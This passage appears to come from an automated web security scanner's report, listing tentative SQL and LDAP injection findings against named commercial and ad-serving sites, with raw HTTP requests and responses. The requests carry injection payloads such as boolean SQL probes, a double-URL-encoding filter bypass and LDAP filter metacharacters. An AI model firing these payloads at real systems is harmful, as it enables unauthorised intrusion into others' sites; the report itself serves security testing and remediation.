t\/css\">\n#fsCartDisplay table tbody td.ship-msg, #fsCartDisplay table tfoot, #fsCartDisplay .accountInfo .accountLink a, a#beginCheckoutAnchor2, #minAvailCred, #minAvailCred + .amount, .accountInfo .accountLink {\n\tdisplay:none;\n}\n<\/style>');document.write('</div>');mboxCurrent.setEventTime('include.end');mboxFactories.get('default').get('FHTOCP_welcome',0).loaded();mboxFactories.get('default').getPCId().forceId("1305509668723-458928.17");

Request 2

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-47884618153420'%20or%201%3d2--%20&mboxPage=1305509219944-478846&mboxCount=1&mbox=FHTOCP_welcome&mboxId=0&mboxTime=1305491220005&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 767
Date: Mon, 16 May 2011 01:34:29 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('FHTOCP_welcome',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-F
...[SNIP]...
#fsCartDisplay table tbody td.ship-msg, #fsCartDisplay table tfoot, #fsCartDisplay .accountInfo .accountLink a, a#beginCheckoutAnchor2, #minAvailCred, #minAvailCred + .amount, .accountInfo .accountLink, #credAmt, #fsCartDisplay .accountInfo {\n\tdisplay:none;\n}\n<\/style>');document.write('</div>');mboxCurrent.setEventTime('include.end');mboxFactories.get('default').get('FHTOCP_welcome',0).loaded();mboxFactories.get('default').getPCId().forceId("1305509669745-803140.17");

1.6. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://gannett.gcion.com
Path:	/addyn/3.0/5111.1/809051/0/-1/ADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn/3.0/5111.1/809051/0/-1/ADTECH;size=300x250;alias=www.usatoday.com/travel/cruises_Poster3;cookie=info;loc=100;target=_blank;key=cw27+cw369+cw368+cw356+cw371+cw370;kvcw=27:369:368:356:371:370;grp=227269;misc=1305508790703 HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24'
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DD077236E651A440C6EAF39F0005EB9

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19048

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
riteln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_793739(i) {
var sVersion_793739 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn/3.0/5111.1/809051/0/-1/ADTECH;size=300x250;alias=www.usatoday.com/travel/cruises_Poster3;cookie=info;loc=100;target=_blank;key=cw27+cw369+cw368+cw356+cw371+cw370;kvcw=27:369:368:356:371:370;grp=227269;misc=1305508790703 HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24''
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DD077236E651A440C6EAF39F0005EB9

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 945

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("money") != -1) rubSect = 7104;
else if (window.location.pathname.indexOf("n
...[SNIP]...

1.7. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NC364_VA_999

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /is/image/bluestembrands/NC364_VA_999?$ShoppingCart$&1%20and%201%3d1--%20=1 HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 30 Mar 2010 15:39:30 GMT
ETag: "943604b62d503a5fc591697122854e85"
Content-Type: image/jpeg
Content-Length: 4123
Expires: Mon, 16 May 2011 11:36:53 GMT
Date: Mon, 16 May 2011 01:36:53 GMT
Connection: close

......JFIF.....H.H...............................    ....................!........."$".$...........................................................................d.d....................................................    ............!...1AQa."2q......#B..$Sb..%4DRcr...................................................!1.A.Q.a"2Bq.............?..].P..P..P..P..P..P..P...l....%E,GiN.@.    H$.....8.o...m..ej.\...;g.......Z.sxEg5..,..)X>.gq~J..P>...k.....l.,.,>"&...T...ely(8..../..{eV.r.Eo...
..vW..\O.5....k.d..v.9N%...O.Q.K./8.    Rw..2..R7Z..%.......]k=.Rr..{.FEr...uE.Y.L...%..K..e+J.....I.(..(..3..V.....7...@..O.R.O...x..L...~|7..T...i.s`.-^C.ud....k..n...."7..KI...T..`(V....f..Wh..k..WN..q....ki..(.8...).....s......!_...?.U....J.D9....F.....R..h.S..Z&..j.[}f{...+)L.>...J....-....R....z..(.<..q...|Ip.........J
L.....u#r......%<..)LL.......HSkObT..4.@..g...l..d...L.q.[ykW+hX..5...|...$.I..[uQ....~&..].f.n..p.3.u.d..Ada@.TT.d......T..K.*u6[<%.x.p$...4T.........(d.j[jR.H*#p..A.(.+...gt.k.gk.....H.-km.....RV..R..cm.wG....W.9%...a.%vq..f......l.v.c.*.....P|...wR..U...OS..BR...#`j../.....6......HQ.K.....BK...UW/.u}..'..T6.n..J..PD.......,.Ew$V-<<.....o.3.mHSL..E_..vW............XgEq]..E..^.....}b.krY~[.Ku@o....J....N...)..i4....g.P....%N.F.LjEE.g.....I.!8G.....-p..&.....o2...HZ.;(..j    9......[.\..C.&,UJ...'.,'.].XV..l....Q...#).M.{'k.*...mw....fM..+.P...V..9
. ......u...`.:....."e....k/..|j,.V.....Jy2...>..
%X....F.......:.F......Q0..7W.%5%nt...Q..........V...q...:...E..{..V..fY.:.6.c..[....S...].aX......3T...:%..Q...e....pmS.....I.[..,.l..q.`w. .j...o...r.,.oZf.":...=.A.....hH...)+..;WR.j<..}.q%T..i.>D..........t.T$.]...'..~j<..v..w.N.;....i}7>=....K...fbr&+c.i..g......./R.....li..^.{*q,S[.3Zn+..[.qu.t<.6B..JI.8..o)i.Oj.W+l....x..XZe:U...0V.f5nm.!...$s..........GCs...-.:R.f......h..*ve.....p.h. ..|....u......N.8&..,..FjLgP...-...)$d.T$.x..,...Jw...'.....B.....L...?.(z.....%.2BpyI......+..$.......hN3..Y...*W.....zZ{.H\..u_.q.....P}...+............i+....k..2.av...n.............d-99m[........1....j4......O2...k...[T.=n..J_I.Zy..[....e..]..{5..N.}.Yr...%...
....4....eAAi.>.O..S..cz..)i.9..WgQ.K.rv.}v].Q..qQ....%...]BJ...)<....$...*.{...CP.....E....xLK..F?)m..*@G8...G...z..:.0i..........D.....m...}...(w. .......F=<+IQ.$.
...[SNIP]...

Request 2

GET /is/image/bluestembrands/NC364_VA_999?$ShoppingCart$&1%20and%201%3d2--%20=1 HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 30 Mar 2010 15:39:30 GMT
ETag: "ad4e8c77ab76576a7687081518de63d6"
Content-Type: image/jpeg
Content-Length: 4137
Expires: Mon, 16 May 2011 11:36:53 GMT
Date: Mon, 16 May 2011 01:36:53 GMT
Connection: close

......JFIF.....H.H...............................    ....................!........."$".$...........................................................................d.d....................................................    ............!..1A.Qaq."2.....#B...$RSb..34Dc.....................................................!1.A.Q.a"2.Bq............?..].P..P..P..P..P..P..o....[0 H.%E,GiN.@.    H...@f.^1[..8.t..qXk.s..L......P.B.o........b...Vw....%..H'..J..r........7.........PqG..^_.....|..j..5R.....z$...k'....:...v.9N%...O.Q.K./8.    P...e.^.n.O.K...6......z.......dW+.O.T^.......]i....R..!C..U$....r(.}...(...._..~..7...@..O.Q    ?..*....p32..n,..@-..k...Z..<....!..gV.|...#~....~..I...
.Y|.l..J..j..    .xqt.....ki..Q.q...S.u....D.9...B..
6.....<.~.s.7.n.....,._J......MG.......^..VU%.>...J.....d4OB    H
.......,._1.........+u.'.e....(..m.`.F.#e..4Jy7.RX...q]K.:.......I............i...l.\d...L.q.[ykW+m.uO....{.]:IX.}......1..M.Z.<.4..:.Ng.u.d..Ada@.TT.D.;WE.:..2.&T.l.xK....I.[.h..5!.}...2P.B......TF.$...Q.W..4..,.....6.j.".......JeIX...v..n0k.?$....Ih.>.~.].{.L.1^q.......~EX....J..'....~)..h.......=2H.5.U..I.Iz%..:....
6.a.>W..Iq>.UU..._x...-..........!@...S{}E...........T.m.Fb..
i.c(......@...;.Q\...k...+..h..+....\/.Z.nK/.a..n..B..iV2v...w..r..M..]?............i.O.T\.x.
,......z......es.Xa..a..X[n$-
....5..b...,.;g..    ..R..(I..    .K.+
........{.j*...g.~.....\<....3..L....xe
aium8.....=A..k.Y:.....M.+X.._..v..IW....mLa..d..-....D...oT.i#c.R.{u..D.[...q....TU.......<%...|.?/(.<..k.....v`...p{.pw^.+U....xN............9.W^.V6.r..)..0......Q.....]}u.6..mw.o..-...e6F.8..:...j...o...r.,...3b..B.Z.. .eE@D.$u.T...?....[5.Td..8..s....$%.B".$<u.......k........G...q...p......    sK......v2]lO.3..1[..Md.?.......z......cMR.c.S.b...i..qX...{..........RO..|........r..9{-7.Iu..S.P..K.n&cV..B.JyBG0..O>z.b.....nx.....JQl.tV.^....%N..|;j.q.....y    .?...^...k.....h.b.jTf..u.....ZNB.FA.BLw..R..\..yPP.|.n`.J...t..f8....C..,.Xq,.....O~....r.ds....q`.    .|P..b.J.....OKOq....n...".l........`..].}}.q....%v...Mb...W....z.xLOi...JA!.P.B........{._V.;..<-F.Zw..#t...n......A..x.%)}'!i...nH>~....t\e....8q.H2....K....m..hi.R]......~b..\..*...
R..s.........v.}v].Q..qQ..a...O..P...ce'....    52...Vy..CP...m.E....xLK.n1.Km.IR.9..."9p..kKt.....pR..2.R.Y![.9.L........P.:A..c-..
...[SNIP]...

1.8. http://serv.adspeed.com/ad.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://serv.adspeed.com
Path:	/ad.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ad.php?do=html&zid=3253&wd=468&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.505050992593/1%25271692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:21:36 GMT
Server: AdSpeed/s3
Content-Length: 2104

<html><head><title>Mouse Fan Travel</title><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js" ></script>
</head><body leftmargin=0 topmargin=0 marginw
...[SNIP]...
<img style="border:0px;" src="http://serv.adspeed.com/ad.php?do=error&type=-7&wd=468&ht=60" alt="i" />
...[SNIP]...

Request 2

GET /ad.php?do=html&zid=3253&wd=468&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.505050992593/1%2527%25271692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

1.9. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [widget_path parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The widget_path parameter appears to be vulnerable to SQL injection attacks. The payloads 20459079'%20or%201%3d1--%20 and 20459079'%20or%201%3d2--%20 were each submitted in the widget_path parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app20459079'%20or%201%3d1--%20&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response 1

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 89530
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:06 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_user_miniPersona_dialog_38586\" class=\"pluck-user-mp-dialog\" >\r\n\t<div class=\"pluck-user-mp-qtip-style\" style=\"display:none;\"><\/div>\r\n\t<div class=\"pluck-user-mp-wrap\">\r\n\t\t<div class=\"pluck-user-mp-sidebar\">\r\n\t\t\t<div class=\"pluck-user-mp-avatar-seethrough\">\r\n\t\t\t\t<a href=\"#\"><img alt=\"\" class=\"pluck-user-mp-avatarimg\" \/><\/a>\r\n\t\t\t<\/div>\r\n\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-wait\">\r\n\t\t\t<div class=\"pluck-user-mp-wait-modal\"> <\/div>\r\n\t\t\t<div class=\"pluck-user-mp-wait-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we process your request<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-loading\">\r\n\t\t\t<div class=\"pluck-user-mp-loading-modal\"> <\/div>\r\n\t\t\t<div class=\"pluck-user-mp-loading-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we retrieve the user\'s information<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-content\">\r\n\t\t\t<h4 class=\"pluck-user-mp-username\"><a href=\"#\"><span class=\"pluck-user-mp-username-value\"><\/span><\/a><\/h4>\r\n\t\t\t<p class=\"pluck-user-mp-asl\"><\/p>\r\n\t\t\t<div class=\"pluck-user-mp-activity-area\">\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-sub-head\">Bio<\/span><span class=\"pluck-user-mp-text pluck-user-mp-bio\"><\/span><\/p>\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-no-bio\">Your bio is currently empty. Now is a great time to <a href=\"#\">fill in your profile<\/a>.<\/span><\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-private-info\">This profile is private.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-sharedWithFriends-info\">This profile is only shared with friends.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-abusive-info\">This profile is under review.<\/p>\r\n\t\t\t\t<p class=\"pluck-error-message pluck-user-mp-error-detail\" style=
...[SNIP]...

Request 2

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app20459079'%20or%201%3d2--%20&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response 2

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 89540
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:07 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_user_miniPersona_dialog_26019\" class=\"pluck-user-mp-dialog\" >\r\n\t<div class=\"pluck-user-mp-qtip-style\" style=\"display:none;\"><\/div>\r\n\t<div class=\"pluck-user-mp-wrap\">\r\n\t\t<div class=\"pluck-user-mp-sidebar\">\r\n\t\t\t<div class=\"pluck-user-mp-avatar-seethrough\">\r\n\t\t\t\t<a href=\"#\"><img alt=\"\" class=\"pluck-user-mp-avatarimg\" \/><\/a>\r\n\t\t\t<\/div>\r\n\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-wait\">\r\n\t\t\t<div class=\"pluck-user-mp-wait-modal\"> <\/div>\r\n\t\t\t<div class=\"pluck-user-mp-wait-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we process your request<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-loading\">\r\n\t\t\t<div class=\"pluck-user-mp-loading-modal\"> <\/div>\r\n\t\t\t<div class=\"pluck-user-mp-loading-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we retrieve the user\'s information<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-content\">\r\n\t\t\t<h4 class=\"pluck-user-mp-username\"><a href=\"#\"><span class=\"pluck-user-mp-username-value\"><\/span><\/a><\/h4>\r\n\t\t\t<p class=\"pluck-user-mp-asl\"><\/p>\r\n\t\t\t<div class=\"pluck-user-mp-activity-area\">\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-sub-head\">Bio<\/span><span class=\"pluck-user-mp-text pluck-user-mp-bio\"><\/span><\/p>\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-no-bio\">Your bio is currently empty. Now is a great time to <a href=\"#\">fill in your profile<\/a>.<\/span><\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-private-info\">This profile is private.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-sharedWithFriends-info\">This profile is only shared with friends.<\/p>\r\n\r\n\t\t\t\t<p class=\"pluck-user-mp-abusive-info\">This profile is under review.<\/p>\r\n\t\t\t\t<p class=\"pluck-error-message pluck-user-mp-error-detail\" style=
...[SNIP]...

2. LDAP injection previous next
There are 2 instances of this issue:

http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

2.1. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://dcl.wdpromedia.com
Path:	/reservations/concat/2.39.0.9/css

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/concat/2.39.0.9/css?files=/nonGlobal/pleaseWait.css HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:36 GMT
Content-Length: 102652
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">

       <div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
